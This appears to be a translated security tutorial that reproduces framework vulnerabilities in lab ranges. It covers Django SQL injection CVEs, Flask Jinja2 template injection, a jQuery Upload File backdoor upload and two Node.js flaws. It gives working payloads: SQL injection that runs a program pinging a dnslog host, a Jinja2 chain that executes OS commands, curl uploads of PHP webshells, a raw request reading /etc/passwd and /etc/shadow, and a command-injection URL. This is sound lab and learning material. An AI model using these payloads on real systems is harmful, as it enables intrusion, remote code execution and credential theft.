Directory
- Service Attack and Defense – Framework Security &CVE Recurrence &Django &Flask &Node.JS &JQuery Vulnerability Recurrence
-
- Introduction to middleware list
- Common language development frameworks
- Python development framework security-Django & Flask vulnerability recurrence
-
- Django development framework
- Vulnerability recurrence
-
- CVE-2019-14234 (Django JSONField/HStoreField SQL injection vulnerability)
- CVE-2021-35042 (Django QuerySet.order_by SQL injection vulnerability)
- Flask Jinja2 SSTI
- Vulnerability recurrence
-
- Flask (Jinja2) server-side template injection vulnerability
- JavaScript Development Framework Security-Jquery & Node Vulnerability Recurrence
-
- jQuery framework
- Vulnerability recurrence
-
- CVE_2018_9207-jQuery Upload File vulnerability recurrence
- Node.js
- Vulnerability recurrence
-
- Node.js directory traversal vulnerability (CVE-2017-14849)
- Node.js command execution (CVE-2021-21315)
Service Attack and Defense-Framework Security & amp;CVE Recurrence & amp;Django & amp;Flask & amp;Node.JS & amp;JQuery Vulnerability Recurrence
Introduction to middleware list
Middleware and framework list:
IIS, Apache, Nginx, Tomcat, Docker, K8s, Weblogic, JBoos, WebSphere, Jenkins, GlassFish, Jetty, Jira, Struts2, Laravel, Solr, Shiro, Thinkphp, Spring, Flask, jQuery, etc.
1. Development framework-PHP-Laravel-Thinkphp
2. Development framework-Javaweb-St2-Spring
3. Development framework-Python-django-Flask
4. Development framework-Javascript-Node.js-JQuery
5. Other frameworks-Java-Apache Shiro & Apache Sorl
Common language development framework
PHP: Thinkphp Laravel YII CodeIgniter CakePHP Zend etc.
JAVA: Spring MyBatis Hibernate Struts2 Springboot etc.
Python: Django Flask Bottle Turbobars Tornado Web2py etc.
Javascript: Vue.js Node.js Bootstrap JQuery Angular etc.
Security testing of common middleware:
1. Improper configuration – parsing & weak passwords
2. Security mechanism-specific security vulnerabilities
3. Security mechanism-weak password blasting attack
4. Security application-framework specific security vulnerabilities
Middleware security testing process:
1. Determine middleware information – name & version & third party
2. Determine middleware problems-improper configuration & open vulnerabilities
3. Determine middleware utilization-weak password & EXP & framework vulnerabilities
Application service security testing process:
1. Determine service opening status – port scanning & combined applications, etc.
2. Determine the service type ownership-database & file transfer & communication, etc.
3. Determine service utilization methods – specific vulnerabilities & unauthorized & weak passwords, etc.
Development framework component security testing process:
1. Determine the types of common language development frameworks
2. Determine the CVE issues in the development framework
Python development framework security-Django & Flask vulnerability recurrence
Django development framework
Introduction: Detailed explanation of django (Python Web framework)
Django is an advanced Python web framework for quickly developing secure and maintainable websites. Built by experienced developers, Django takes care of the troublesome parts of website development, allowing you to focus on writing your application without having to develop it from scratch. It is free and open source, has an active and thriving community, rich documentation, and many free and paid solutions.
Django is a popular open source web framework written in Python that many websites and apps are based on.
Django development. Django adopts the MTV framework pattern, that is, model M, view V and template T, using
With Django, programmers can easily and quickly create high-quality, easy-to-maintain, database-driven applications. and
Django also contains many powerful third-party plug-ins, making Django highly scalable.
Security Question:
CVE_2019_14234
CVE-2021-35042
…
Vulnerability Recurrence
CVE-2019-14234 (Django JSONField/HStoreField SQL injection vulnerability)
The vulnerability requires developers to use JSONField/HStoreField; in addition, it is possible to control the field names of QuerySet. Django’s built-in application Django-Admin is affected, providing us with an easy way to reproduce the vulnerability.
Shooting range: vulhub
Reference: Django JSONField/HStoreField SQL injection vulnerability recurrence
Start the environment:
To access the web interface:
First, log in to Django-Admin using your username and password.
http://your-ip:8000/admin/
Account: admin
Password: a123123123
Successful login:
Then go to the list view of the model:
http://your-ip:8000/admin/vuln/collection/
Collection
Add to the GET parameters, where is a JSONField:
detail__a'b=123
detail
payload:
http://your-ip:8000/admin/vuln/collection/?detail__a'b=123
You can see that the single quote injection is successful and the SQL statement reports an error:
Create cmd_exec:
payload: /admin/vuln/collection/?detail__title')='1' or 1=1% 20;create table cmd_exec(cmd_output text)--
Execution effect:
Created successfully
Call cmd_exec to execute the command:
DNSlog gets address
payload: /admin/vuln/collection/?detail__title')='1' or 1=1% 20;copy cmd_exec FROM PROGRAM 'ping xxxx.dnslog.cn'--
DNSlog echo effect:
CVE-2021-35042 (Django QuerySet.order_by SQL injection vulnerability)
The vulnerability requires developers to use the order_by functionality. In addition, you can control the input of the query set.
Shooting range: vulhub
Reference: Django QuerySet.order_by SQL injection vulnerability recurrence
Start the environment:
To access the web interface:
First, go to list view and add to GET parameters.
payload:
http://your-ip:8000/vuln/order=-id
After execution, you will see the data sorted by id in descending order:
payload: Table of contents: /vuln/?order=vuln_collection.name);select updatexml(1, concat (0x7e,(select @@basedir)),1)# Version: /vuln/?order=vuln_collection.name);select updatexml(1, concat (0x7e,(select version())),1)# Database name: /vuln/?order=vuln_collection.name);select updatexml(1, concat (0x7e,(select database())),1)#
You can see that the single bracket has been injected successfully, and you can get the information from the error.
View catalog:
Explosive version number:
Explosive database name:
Flask Jinja2 SSTI
Introduction: Detailed explanation of Flask
Flask is a lightweight web application framework written in Python. Its WSGI toolbox uses
Werkzeug, the template engine uses Jinja2. Flask is licensed under BSD.Flask is also called a “microframework” because it uses a simple core and uses extensions to add additional functionality. Flask does not have a default database or form validation tool.
Security Question:
Flask (Jinja2) server-side template injection vulnerability
…
Vulnerability Recurrence
Flask (Jinja2) server-side template injection vulnerability
Shooting range: vulhub
Reference: Flask (Jinja2) server-side template injection vulnerability recurrence
Start the environment:
To access the web interface:
Next, access http://your-ip/?name={{123*123}}
. If you get the result 15129, it means that the SSTI vulnerability exists.
POC to get the eval function and execute arbitrary python code:
{<!-- -->% for c in [].__class__.__base__.__subclasses__() %} {<!-- -->% if c.__name__ == 'catch_warnings' %} {<!-- -->% for b in c.__init__.__globals__.values() %} {<!-- -->% if b.__class__ == {<!-- -->}.__class__ %} {<!-- -->% if 'eval' in b.keys() %} {<!-- -->{<!-- --> b['eval']('__import__("os").popen("id").read()' ) }} {<!-- -->% endif %} {<!-- -->% endif %} {<!-- -->% endfor %} {<!-- -->% endif %} {<!-- -->% endfor %}
ps: URL encoding is required. After encoding, you can send it directly through GET request.
At the execution command point, customize the command to be executed and the information to be viewed. Each time the command is changed, the URL needs to be encoded and resent.
Other commands: ls, whoami
Execution effect:
JavaScript Development Framework Security-Jquery & Node Vulnerability Recurrence
jQuery framework
Introduction: Detailed explanation of jQuery
jQuery is a fast and concise JavaScript framework. It is another excellent JavaScript code library (framework) after Prototype. It was released by John Resig in January 2006. The purpose of jQuery’s design is “write less, do more”, which means writing less code and doing more things. It encapsulates common JavaScript function codes, provides a simple JavaScript design pattern, and optimizes HTML document operations, event processing, animation design and Ajax interaction.
Security Question:
CVE_2018_9207
CVE_2018_9208
CVE_2018_9209
…
Vulnerability Recurrence
CVE_2018_9207-jQuery Upload File vulnerability recurrence
jQuery is a fast and concise JavaScript framework. It is another excellent JavaScript code library (framework) after Prototype. It was released by John Resig in January 2006. jQuery Upload File <= 4.0.2 Any file upload in the root directory/jquery-upload-file
Shooting range: vulfocus
Open the shooting range:
To access the web interface:
Access the framework reference directory structure:
/jquery-upload-file/
use:
One command solves, accesses and uploads files.
payload: //Visit the website and upload; the premise is to create a backdoor file in the folder. curl -F "[email protected]" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php" curl -F "[email protected]" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"
Upload shell.php:
Upload cmd.php:
Check:
The location of the uploaded file: (the backdoor is php)
/jquery-upload-file/php/uploads/
Verify whether it can be parsed and executed:
Use Ant Sword to connect:
connection succeeded
The other security issues listed are basically the same.
Node.js
Detailed explanation: node.js detailed explanation
Node.js is a JavaScript running environment based on the Chrome V8 engine, used to conveniently build responses
Fast, easily scalable web applications.Node.js optimizes some special use cases and provides alternative APIs to make V8 run better in non-browser environments. The V8 engine executes Javascript very quickly and has very good performance. It is a platform built on the Chrome JavaScript runtime. Used to easily build network applications with fast response and easy expansion
Security Question:
CVE_2021_21315
CVE_2017_14849
…
Vulnerability Recurrence
Node.js directory traversal vulnerability (CVE-2017-14849)
Joyent Node.js is a web application platform built on the Google V8 JavaScript engine from the American company Joyent. The platform is primarily used for building highly scalable applications and writing connection code that can handle tens of thousands of simultaneous connections to a physical machine. There is a security vulnerability in Joyent Node.js 8.5.0 versions prior to 8.6.0. A remote attacker could exploit this vulnerability to access sensitive files.
The cause of the vulnerability is that a logic error occurred when Node.js 8.5.0 performed the
normalize
operation on the directory, resulting in a jump to the upper layer (such as../../../../ ../../etc/passwd
), addfoo/../
in the middle (such as../../../foo/../ ../../../etc/passwd
), you can makenormalize
return/etc/passwd
, but in fact the correct result should be../../../../../../etc/passwd
.Web frameworks such as express usually provide static file server functions, which rely on the
normalize
function. For example, when express determines whether the path exceeds the scope of the static directory, it uses thenormalize
function. The above bug causes thenormalize
function to return an incorrect result, thus bypassing the check and causing arbitrary files. Read vulnerability.
Shooting range: vulfocus
Reference: CVE-2017-14849 recurrence
Start the environment:
To access the web interface:
The file /static/main.js
is referenced, indicating that there is a static file server.
Construct request:
Just send the following data packet through GET request: GET: ... /static/../../../a/../../../../etc/passwd ...
Complete data package:
GET /static/../../../a/../../../../etc/passwd HTTP/1.1 Host: 192.168.100.134:56111 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close
After sending to the resender, and then sending the packet again:
(If you open the web interface to capture packets, after structuring the request, the packet cannot be echoed normally and an error status code is reported. You can try to delete cookies and other related information, otherwise it may not be echoed normally and the error status code may not be echoed normally. If it is echoed normally, it is OK No need to delete.)
Effect: Successfully read the /etc/passwd
file
Effect: Successfully read the /etc/shadow
file
Node.js command execution (CVE-2021-21315)
Node.js-systeminformation is a Node.JS module used to obtain various system information. It contains a variety of lightweight functions that can retrieve detailed hardware and system-related information. The npm team released a security advisory, systeminformation in the Node.js library There is a command injection vulnerability (CVE-2021-21315) in the software package with a CVSSv3 score of 7.8. An attacker can execute system commands by injecting payload in unsanitized parameters.
Shooting range: vulfocus
Start the environment:
To access the web interface:
Construct a GET request:
payload: /api/getServices?name[]=$(echo 'rumilc666' > rumi.txt)
After execution:
verify:
The file was generated successfully
docker ps docker exec -it id /bin/bash